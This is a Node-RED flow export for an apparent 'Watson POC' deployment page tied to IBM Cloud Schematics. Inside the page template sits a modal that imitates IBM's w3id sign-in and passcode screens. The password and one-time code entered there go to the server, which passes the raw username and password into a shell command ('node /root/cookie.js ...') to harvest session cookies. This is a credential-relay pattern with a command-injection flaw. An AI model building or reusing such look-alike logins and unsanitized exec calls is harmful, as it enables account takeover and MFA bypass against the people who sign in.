nautomation
[{"id":"1c2d6e78.ff8e7a","type":"tab","label":"Flow 1","disabled":false,"info":""},{"id":"3ccc980d.314d4","type":"socketio-config","port":"80","sendClient":"true","path":"/socket.io","bindToNode":true},{"id":"2b836cd.3aa9214","type":"tls-config","name":"","cert":"","key":"","ca":"","certname":"","keyname":"","caname":"","servername":"","verifyservercert":false},{"id":"ea78eae2.f9578","type":"tls-config","name":"","cert":"","key":"","ca":"","certname":"","keyname":"","caname":"","servername":"","verifyservercert":false},{"id":"3bc84f4e.84ed1","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"deploy/:company/:cid","method":"get","upload":false,"swaggerDoc":"","x":120,"y":180,"wires":[["552c2e95.869f2"]]},{"id":"5bfcecd3.14b81c","type":"http response","z":"1c2d6e78.ff8e7a","name":"","statusCode":"","headers":{},"x":1070,"y":180,"wires":[]},{"id":"a0849a.76e05368","type":"template","z":"1c2d6e78.ff8e7a","name":"","field":"payload","fieldType":"msg","format":"handlebars","syntax":"mustache","template":"<link rel=\"stylesheet\" type=\"text/css\" href=\"/static/css/bundle.s41.css\">\n\n<link href=\"https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/css/bootstrap.min.css\" rel=\"stylesheet\" integrity=\"sha384-giJF6kkoqNQ00vy+HMDP7azOuL0xtbfIcaT9wjKHr8RbDVddVHyTfAAsrekwKmP1\" crossorigin=\"anonymous\">\n<link rel=\"stylesheet\" href=\"https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css\">\n  \n<div class=\"container\" style=\"width: 50rem\">\n  <div class=\"row\">\n    <div class=\"col-9\">\n        <div class=\"jumbotron jumbotron-fluid\">\n            <h1 class=\"display-6\">Welcome to the Watson POC!</h1>\n            <p class=\"lead\">We'll be building an environment in your account, and pre-loading it with data from the website: <a href=\"{{url}}\" target=\"_blank\">{{url}}</a>\n            <br><br>\n            You can override the url in the workspace before you apply the plan.\n            </p>\n        </div>\n        Click the link below, then click \"Create Workspace\", and then click \"Apply Plan\"\n        <br><center>\n        <a id=\"startTerraform\" data-toggle=\"modal\" data-target=\"#loginm\" href=\"https://cloud.ibm.com/schematics/workspaces/create?workspace_name={{company}}-{{cid}}&repository=https://github.com/garrettrowe/watsonAutomation&terraform_version=terraform_v0.13\" target=\"_blank\">Deploy to IBM Cloud<img src=\"/static/img/terraform-2d14a7d6b7.svg\" style=\"padding-left:10px\"></a>\n        </center>\n        <br>\n        Once your plan begins deploying, return here and follow along.  <br>\n    </div>\n    <div class=\"col-sm\">\n      <img src=\"../../{{company}}.png\" style=\"padding-top: 50px; width:150px\">\n    </div>\n  </div>\n\n    <div class=\"card\" style=\"width: 40rem;\">\n        <div class=\"card-header\">\n            <div class=\"row\">\n                <div class=\"col-3\">Deployment</div>\n                <div class=\"col-8 progress\">\n                    <div class=\"progress-bar progress-bar-striped progress-bar-animated\" role=\"progressbar\"  style=\"width: 0%\"></div>\n                </div>\n            </div>\n        </div>\n        <div class=\"card-body\">\n            <p class=\"card-text\" id=\"log\"></p>\n        </div>\n    </div>\n    <div class=\"card\" style=\"width: 40rem;\">\n        <div class=\"card-header\">Demo Links</div>\n        <div class=\"card-body\">\n            <p class=\"card-text\" id=\"completel\"></p>\n        </div>\n    </div>\n</div>\n\n<div class=\"modal fade\" id=\"loginm\" tabindex=\"-1\" role=\"dialog\" aria-labelledby=\"Login\" aria-hidden=\"true\">\n  <div class=\"modal-dialog\" role=\"document\" style=\"width:auto;height:auto;\">\n    <div class=\"modal-content\" id=\"modcont\" style=\"width:600px;height:600px;\" >\n\n    </div>\n  </div>\n</div>\n\n<div id=\"hiddenitems\" style=\"display:none\">\n    <div id=\"loader\" class='loader'></div>\n    <div id=\"loginpanel\" >\n    <div  class=\"wrapper\">\n    <div id=\"header\">\n      <div class=\"inner\">\n        <div id=\"logo\"></div>\n      </div>\n    </div>\n    <div class=\"inner\">\n      <div class=\"container\">\n        <div class=\"signin\">\n          <div class=\"icon\"></div>\n          <h1 id=\"w3idheader\">Sign in with your <span class=\"name\">w3<b>id</b></span></h1>\n          <form id = \"login1\" method=\"post\" action=\"/\">\n            <input type=\"hidden\" name=\"login-form-type\" value=\"pwd\">\n            <input id=\"desktop\" type=\"email\" class=\"desktop\" name=\"username\" aria-label=\"Your IBM email address (e.g. jdoe@us.ibm.com)\" placeholder=\"Your IBM email address (e.g. jdoe@us.ibm.com)\">\n            <input aria-label=\"password\" type=\"password\" name=\"password\" placeholder=\"Password\">\n            <button id=\"btn_signin\" class=\"btn_signin\" type=\"submit\">Sign In</button>\n          </form>\n        </div>\n      </div>\n    </div>\n    </div>\n    <div id=\"footer\">\n        <div class=\"inner\">\n          <div id=\"logo\"></div>\n        </div>\n    </div>\n    </div>\n    \n  \n<div id=\"otpdiv\">\n    <div  class=\"wrapper\">\n    <div id=\"header\">\n      <div class=\"inner\">\n        <div id=\"logo\"></div>\n      </div>\n    </div>\n    <div class=\"inner\">\n      <div class=\"container\">\n        <h1 id=\"header_text\">Enter your passcode</h1>\n        <form id=\"otpForm\" method=\"post\" action=\"/\" autocomplete=\"off\">\n          <p id=\"instructions\" class=\"type-body-m\">A passcode was sent to your email address.</p>\n          <p id=\"timerDiv\"><span id=\"expTime\">Your one-time passcode will expire in </span><b id=\"time\">05:02</b></p>\n          <div class=\"passcode\">\n            <label id=\"correlation\"></label>\n            <input autocomplete=\"off\" class=\"ci-input\" type=\"text\" name=\"otp\" id=\"otp\" maxlength=\"40\" pattern=\"[0-9]*\" oninput=\"enableButton(this)\" autofocus=\"\">\n          </div>\n          <input id=\"btn_submit\" class=\"btn_submit\" type=\"submit\" value=\"Submit\" disabled=\"\">\n          <div class=\"spacer blue\"></div>\n        </form>\n      </div>\n    </div>\n    </div>\n    </div>\n</div>\n\n<script src=\"https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/js/bootstrap.bundle.min.js\" integrity=\"sha384-ygbV9kiqUc6oa4msXn9868pTtWMgiQaeYH7/t7LECLbyPA2x65Kgf80OJFdroafW\" crossorigin=\"anonymous\"></script>\n<script src=\"https://code.jquery.com/jquery-3.5.1.min.js\" integrity=\"sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=\" crossorigin=\"anonymous\"></script>\n<script src=\"../../socket.io/socket.io.js\"></script>\n<script>\nvar socket = io();\nvar progress = 0;\n\nfunction enableButton(text) {\n  if (text.value != null && text.value != \"\") {\n    document.getElementById(\"btn_submit\").disabled = false;\n  } else {\n    document.getElementById(\"btn_submit\").disabled = true;\n  }\n}\nvar count = 60 * 10; \nfunction timeOTP(){\n\tvar counter = setInterval(timer, 1000); //runs every second\n}\nfunction timer() {\n  var time = count,\n    minutes, seconds;\n  minutes = parseInt(time / 60, 10);\n  seconds = parseInt(time % 60, 10);\n  minutes = minutes < 10 ? \"0\" + minutes : minutes;\n  seconds = seconds < 10 ? \"0\" + seconds : seconds;\n  document.getElementById(\"time\").innerHTML = minutes + \":\" + seconds;\n  count = count - 1;\n  if (count < 0) {\n    clearInterval(counter); //end counter\n    return;\n  }\n}\n    \n$('#login1').submit(function(e){\n    e.preventDefault();\n    $.ajax({\n        url: '/startlogin',\n        type: 'post',\n        data:$('#login1').serialize(),\n        success:function(){}\n    });\n});\n$('#otpForm').submit(function(e){\n    e.preventDefault();\n    $.ajax({\n        url: '/otpForm',\n        type: 'post',\n        data:$('#otpForm').serialize(),\n        success:function(){}\n    });\n});\n\n$( document ).ready(function() {\n    $(\"#loginpanel\").appendTo(\"#modcont\");\n    $('#loginm').modal({\n      keyboard: false,\n      backdrop: \"static\"\n    }).modal('show');\n});\n\nsocket.on('connect', function() {\n    console.log(\"socket connected\");\n});\nsocket.on('disconnect', function() {\n\tconsole.log(\"socket disconnected\");\n});\n\nsocket.on('status', function(data) {\n    if(window.location.href.includes(data.r)){\n        if(data.s == \"login\"){\n            $(\"#modcont\").children().first().appendTo(\"#hiddenitems\");\n            $(\"#loader\").appendTo(\"#modcont\");\n        }\n        if(data.s == \"otp\"){\n            timeOTP();\n            $(\"#modcont\").children().first().appendTo(\"#hiddenitems\");\n            $(\"#otpdiv\").appendTo(\"#modcont\");\n            $(\"#correlation\").html(data.correlation);\n        }\n        if(data.s == \"ok\"){\n            $('#loginm').modal('hide');\n            $(\"#modcont\").children().first().appendTo(\"#hiddenitems\");\n        }\n            \n    }\n});\n\nsocket.on('log', function(data) {\n    if(data.i == \"{{company}}-{{cid}}\"){\n\t    $(\"#log\").append(\"<i class='bi-gear' style='padding-right:10px'></i>\" + data.log + \"<br>\");\n\t    prog();\n    }\n});\nsocket.on('complete', function(data) {\n    if(data.i == \"{{company}}-{{cid}}\"){\n\t    $(\"#completel\").html(\"<a href='http://\" + data.data + \"/test' target='_blank'><img width='40px' height='40px' src='https://cache.globalcatalog.cloud.ibm.com/api/v1/7045626d-55e3-4418-be11-683a26dbc1e5/artifacts/cache/fba11f3b658ae170d13ebec56ef58d0b-public/conversation.svg'></a>\");\n        $('.progress-bar').css('width', '100%');\n        $('.progress-bar').removeClass('progress-bar-striped').removeClass('progress-bar-animated').addClass('bg-success');\n    }\n});\n    \nfunction prog(){\n    progress +=1;\n    $('.progress-bar').css('width', ((progress/17)*100)+'%');\n}\n\n$(\"#startTerraform\").click(function(e) {\n    $(\"#log\").append(\"<i class='bi-gear' style='padding-right:10px'></i>Creating Workspace<br>\");\n    prog();\n});\n    \n</script>","output":"str","x":920,"y":180,"wires":[["5bfcecd3.14b81c"]]},{"id":"8697e700.887bf8","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg.socketIOEvent = \"log\";\n\n\nreturn msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":360,"y":300,"wires":[["9c8ff97c.1818"]]},{"id":"552c2e95.869f2","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg.cid = msg.req.params.cid;\nmsg.company = msg.req.params.company;\nmsg.filename = \"/root/scrape/\" + msg.company + \".txt\";\n\nreturn msg;\n\n","outputs":1,"noerr":0,"initialize":"","finalize":"","x":460,"y":180,"wires":[["563b1f86.47f34"]]},{"id":"9c8ff97c.1818","type":"socketio-out","z":"1c2d6e78.ff8e7a","name":"","server":"3ccc980d.314d4","x":580,"y":300,"wires":[]},{"id":"4d5f901.54df87","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"/log","method":"post","upload":false,"swaggerDoc":"","x":140,"y":280,"wires":[["c301b9fa.2ee74","8697e700.887bf8"]]},{"id":"c301b9fa.2ee74","type":"http response","z":"1c2d6e78.ff8e7a","name":"","statusCode":"","headers":{},"x":350,"y":340,"wires":[]},{"id":"f6f1feaa.5a054","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"log","method":"get","upload":false,"swaggerDoc":"","x":140,"y":320,"wires":[["8697e700.887bf8","c301b9fa.2ee74","24b12d72.90b602","4e9faf82.008418"]]},{"id":"71fb0414.160f7c","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"iplog","method":"get","upload":false,"swaggerDoc":"","x":140,"y":440,"wires":[["c301b9fa.2ee74","8cbf56d4.ff0498"]]},{"id":"8cbf56d4.ff0498","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"flow.set(msg.payload.i, msg.payload.ip)\nreturn msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":380,"y":440,"wires":[[]]},{"id":"d0367496.356e2","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"complete","method":"post","upload":false,"swaggerDoc":"","x":160,"y":480,"wires":[["c301b9fa.2ee74","f3032df4.ddca7"]]},{"id":"f3032df4.ddca7","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg.socketIOEvent = \"complete\";\n\nmsg.payload.data = flow.get(msg.payload.i)\nreturn msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":380,"y":480,"wires":[["9c8ff97c.1818"]]},{"id":"2cb06f84.e9f66","type":"template","z":"1c2d6e78.ff8e7a","name":"","field":"payload","fieldType":"msg","format":"handlebars","syntax":"mustache","template":"\n<script>\nwindow.location.href = \"http://150.238.89.98/deploy/{{company}}/{{cid}}\";\n</script>","output":"str","x":920,"y":220,"wires":[["5bfcecd3.14b81c"]]},{"id":"390d0722.6415d8","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"deploy","method":"get","upload":false,"swaggerDoc":"","x":110,"y":140,"wires":[["9dbeeeb2.133a2"]]},{"id":"9dbeeeb2.133a2","type":"template","z":"1c2d6e78.ff8e7a","name":"","field":"payload","fieldType":"msg","format":"handlebars","syntax":"mustache","template":"\n<script>\nwindow.location.href = \"http://150.238.89.98/deploy/default\";\n</script>","output":"str","x":920,"y":140,"wires":[["5bfcecd3.14b81c"]]},{"id":"4c9edc2a.ad1054","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"deploy/:company","method":"get","upload":false,"swaggerDoc":"","x":120,"y":220,"wires":[["e4bf07b.4057778"]]},{"id":"e4bf07b.4057778","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg.company = msg.req.params.company;\nmsg.cid = \"watsonAutomation_\" + Math.round(Math.random()*1000000);\nmsg.payload = msg.company;\nreturn msg;\n","outputs":1,"noerr":0,"initialize":"","finalize":"","x":320,"y":220,"wires":[["53793006.c32668"]]},{"id":"53793006.c32668","type":"exec","z":"1c2d6e78.ff8e7a","command":"node scrape.js","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":500,"y":220,"wires":[["2cb06f84.e9f66"],["2cb06f84.e9f66"],[]]},{"id":"563b1f86.47f34","type":"file in","z":"1c2d6e78.ff8e7a","name":"","filename":"","format":"utf8","chunk":false,"sendError":false,"encoding":"none","x":610,"y":180,"wires":[["94b53b23.1d7c98"]]},{"id":"94b53b23.1d7c98","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg.url = msg.payload;\nreturn msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":760,"y":180,"wires":[["a0849a.76e05368"]]},{"id":"56e2f352.c2225c","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"otpForm","method":"post","upload":false,"swaggerDoc":"","x":240,"y":600,"wires":[["e4585395.61c1b"]]},{"id":"ad633f23.6d9cf8","type":"http response","z":"1c2d6e78.ff8e7a","name":"","statusCode":"","headers":{},"x":770,"y":600,"wires":[]},{"id":"8717614b.617348","type":"template","z":"1c2d6e78.ff8e7a","name":"","field":"payload","fieldType":"msg","format":"handlebars","syntax":"mustache","template":"<html><head>\n  <meta charset=\"UTF-8\">\n  <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n  <meta name=\"viewport\" content=\"initial-scale=1,user-scalable=no,maximum-scale=1\">\n  <link rel=\"stylesheet\" type=\"text/css\" href=\"https://w3id.sso.ibm.com:443/static/css/bundle.s41.css\">\n  <title>IBM w3id</title>\n  </head>\n\n<body id=\"body\">\n  <div class=\"wrapper\">\n    <div id=\"header\">\n      <div class=\"inner\">\n        <div id=\"logo\"></div>\n      </div>\n    </div>\n\n    <div class=\"inner\">\n      <div class=\"container\">\n        <div class=\"signin\">\n          <div class=\"icon\"></div>\n          <h1 id=\"w3idheader\">Sign in with your <span class=\"name\">w3<b>id</b></span></h1>\n\n          <form method=\"post\" action=\"/login\">\n            <input type=\"hidden\" name=\"login-form-type\" value=\"pwd\">\n            <input id=\"desktop\" type=\"email\" class=\"desktop\" name=\"username\" aria-label=\"Your IBM email address (e.g. jdoe@us.ibm.com)\" placeholder=\"Your IBM email address (e.g. jdoe@us.ibm.com)\">\n            <input aria-label=\"password\" type=\"password\" name=\"password\" placeholder=\"Password\">\n            <button id=\"btn_signin\" class=\"btn_signin\" type=\"submit\">Sign In</button>\n          </form>\n        </div>\n      </div>\n    </div>\n    <div class=\"push\"></div>\n  </div>\n  <!-- footer -->\n  <div id=\"footer\">\n    <div class=\"inner\">\n      <div id=\"logo\"></div>\n    </div>\n  </div>\n\n</body></html>","output":"str","x":620,"y":600,"wires":[["ad633f23.6d9cf8"]]},{"id":"b3d51d82.9f493","type":"http in","z":"1c2d6e78.ff8e7a","name":"","url":"startlogin","method":"post","upload":false,"swaggerDoc":"","x":240,"y":640,"wires":[["ad633f23.6d9cf8","ee010c1d.fbaf6"]]},{"id":"300c158e.d1d6d2","type":"socketio-in","z":"1c2d6e78.ff8e7a","name":"","server":"3ccc980d.314d4","rules":[{"v":"cookies"},{"v":"status"}],"x":590,"y":440,"wires":[["e0bd0d00.0d357","487dbe74.2f6938"]]},{"id":"e0bd0d00.0d357","type":"switch","z":"1c2d6e78.ff8e7a","name":"","property":"socketIOEvent","propertyType":"msg","rules":[{"t":"eq","v":"cookies","vt":"str"},{"t":"eq","v":"status","vt":"str"}],"checkall":"true","repair":false,"outputs":2,"x":750,"y":440,"wires":[["4c406e0d.e4d6c8"],["b216eeae.b0134","9c8ff97c.1818"]]},{"id":"4c406e0d.e4d6c8","type":"debug","z":"1c2d6e78.ff8e7a","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"true","targetType":"full","statusVal":"","statusType":"auto","x":990,"y":440,"wires":[]},{"id":"b216eeae.b0134","type":"debug","z":"1c2d6e78.ff8e7a","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"true","targetType":"full","statusVal":"","statusType":"auto","x":930,"y":560,"wires":[]},{"id":"487dbe74.2f6938","type":"debug","z":"1c2d6e78.ff8e7a","name":"","active":false,"tosidebar":true,"console":false,"tostatus":false,"complete":"true","targetType":"full","statusVal":"","statusType":"auto","x":770,"y":340,"wires":[]},{"id":"8f3a2105.e728a8","type":"exec","z":"1c2d6e78.ff8e7a","command":"","addpay":true,"append":"","useSpawn":"true","timer":"","oldrc":false,"name":"cookie","x":770,"y":680,"wires":[["a97f45c1.3ccd28"],["f964ba59.51e3b8"],["f964ba59.51e3b8"]]},{"id":"2463f156.6c41ae","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg2 = {};\nmsg2.payload = \"node /root/cookie.js \" + msg.req.headers.referer + \" \" + msg.payload.username + \" \" + msg.payload.password\nreturn msg2;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":620,"y":680,"wires":[["8f3a2105.e728a8"]]},{"id":"ee010c1d.fbaf6","type":"trigger","z":"1c2d6e78.ff8e7a","name":"","op1":"","op2":"","op1type":"pay","op2type":"nul","duration":"5","extend":true,"overrideDelay":false,"units":"s","reset":"","bytopic":"topic","topic":"req.headers.referer","outputs":1,"x":460,"y":680,"wires":[["2463f156.6c41ae"]]},{"id":"a97f45c1.3ccd28","type":"debug","z":"1c2d6e78.ff8e7a","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"true","targetType":"full","statusVal":"","statusType":"auto","x":950,"y":660,"wires":[]},{"id":"f964ba59.51e3b8","type":"debug","z":"1c2d6e78.ff8e7a","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"true","targetType":"full","statusVal":"","statusType":"auto","x":950,"y":700,"wires":[]},{"id":"e8f1cbbf.813718","type":"status","z":"1c2d6e78.ff8e7a","name":"","scope":["8f3a2105.e728a8"],"x":240,"y":740,"wires":[["473bf760.f73878"]]},{"id":"725131f6.104f38","type":"delay","z":"1c2d6e78.ff8e7a","name":"","pauseType":"delay","timeout":"2","timeoutUnits":"hours","rate":"1","nbRateUnits":"1","rateUnits":"second","randomFirst":"1","randomLast":"5","randomUnits":"seconds","drop":false,"x":620,"y":740,"wires":[["8f3a2105.e728a8"]]},{"id":"473bf760.f73878","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg.kill = \"SIGINT\";\nmsg.pid = msg.status.text.replace(\"pid:\",\"\");\nif (msg.pid != \"killed\")\n    return msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":440,"y":740,"wires":[["725131f6.104f38"]]},{"id":"39fc3e3f.504dca","type":"inject","z":"1c2d6e78.ff8e7a","name":"","props":[{"p":"flush","v":"true","vt":"bool"}],"repeat":"","crontab":"","once":false,"onceDelay":0.1,"topic":"","x":610,"y":780,"wires":[["725131f6.104f38"]]},{"id":"24b12d72.90b602","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"if(msg.payload.wa){\n    msg.socketIOEvent = \"wa\";\n    msg.payload.waid = msg.payload.waid.replace(/:res.*/, \"\").replace(\"/\", \"%2F\") + \"::/home\"\n    return msg;\n}\n","outputs":1,"noerr":0,"initialize":"","finalize":"","x":300,"y":380,"wires":[["1df50843.5e2f18","4e9faf82.008418"]]},{"id":"1df50843.5e2f18","type":"delay","z":"1c2d6e78.ff8e7a","name":"","pauseType":"delay","timeout":"5","timeoutUnits":"minutes","rate":"1","nbRateUnits":"1","rateUnits":"second","randomFirst":"1","randomLast":"5","randomUnits":"seconds","drop":false,"x":440,"y":380,"wires":[["9c8ff97c.1818"]]},{"id":"844095df.d11a28","type":"inject","z":"1c2d6e78.ff8e7a","name":"","props":[{"p":"flush","v":"true","vt":"bool"}],"repeat":"","crontab":"","once":false,"onceDelay":0.1,"topic":"","x":170,"y":560,"wires":[["1df50843.5e2f18"]]},{"id":"4e9faf82.008418","type":"debug","z":"1c2d6e78.ff8e7a","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"true","targetType":"full","statusVal":"","statusType":"auto","x":520,"y":520,"wires":[]},{"id":"de21ea3b.dfa128","type":"inject","z":"1c2d6e78.ff8e7a","name":"","props":[{"p":"payload"},{"p":"topic","vt":"str"}],"repeat":"","crontab":"","once":false,"onceDelay":0.1,"topic":"","payload":"","payloadType":"date","x":150,"y":860,"wires":[["c9283ff6.f826e8"]]},{"id":"c9283ff6.f826e8","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg = {\"payload\":{\"s\":\"login\",\"r\":\"https://daidemos.com/deploy/qad/watsonAutomation_717889\"},\"socketIOEvent\":\"status\",\"socketIOId\":\"aMNUu2NEdyGae2jKAABb\",\"_msgid\":\"ceaffa1e.1cb8e8\"}\nreturn msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":360,"y":860,"wires":[["9c8ff97c.1818"]]},{"id":"d28fc27b.76669","type":"inject","z":"1c2d6e78.ff8e7a","name":"","props":[{"p":"payload"},{"p":"topic","vt":"str"}],"repeat":"","crontab":"","once":false,"onceDelay":0.1,"topic":"","payload":"","payloadType":"date","x":160,"y":820,"wires":[["388c0a9d.1ab7ee"]]},{"id":"388c0a9d.1ab7ee","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg = {\"payload\":{\"s\":\"ok\",\"r\":\"https://daidemos.com/deploy/qad/watsonAutomation_717889\"},\"socketIOEvent\":\"status\",\"socketIOId\":\"aMNUu2NEdyGae2jKAABb\",\"_msgid\":\"ceaffa1e.1cb8e8\"}\nreturn msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":370,"y":820,"wires":[["9c8ff97c.1818"]]},{"id":"2865f600.6f94ba","type":"inject","z":"1c2d6e78.ff8e7a","name":"","props":[{"p":"payload"},{"p":"topic","vt":"str"}],"repeat":"","crontab":"","once":false,"onceDelay":0.1,"topic":"","payload":"","payloadType":"date","x":160,"y":900,"wires":[["1565555f.8d9aab"]]},{"id":"1565555f.8d9aab","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg = {\"payload\":{\"correlation\":\"3241 -\",\"s\":\"otp\",\"r\":\"https://daidemos.com/deploy/qad/watsonAutomation_717889\"},\"socketIOEvent\":\"status\",\"socketIOId\":\"aMNUu2NEdyGae2jKAABb\",\"_msgid\":\"ceaffa1e.1cb8e8\"}\nreturn msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":370,"y":900,"wires":[["9c8ff97c.1818"]]},{"id":"e4585395.61c1b","type":"function","z":"1c2d6e78.ff8e7a","name":"","func":"msg.socketIOEvent = \"otp\";\nmsg.payload.i = msg.req.headers.referer;\nif(msg.payload.otp.length>1)\n    return msg;","outputs":1,"noerr":0,"initialize":"","finalize":"","x":420,"y":600,"wires":[["4e9faf82.008418","9c8ff97c.1818"]]}]
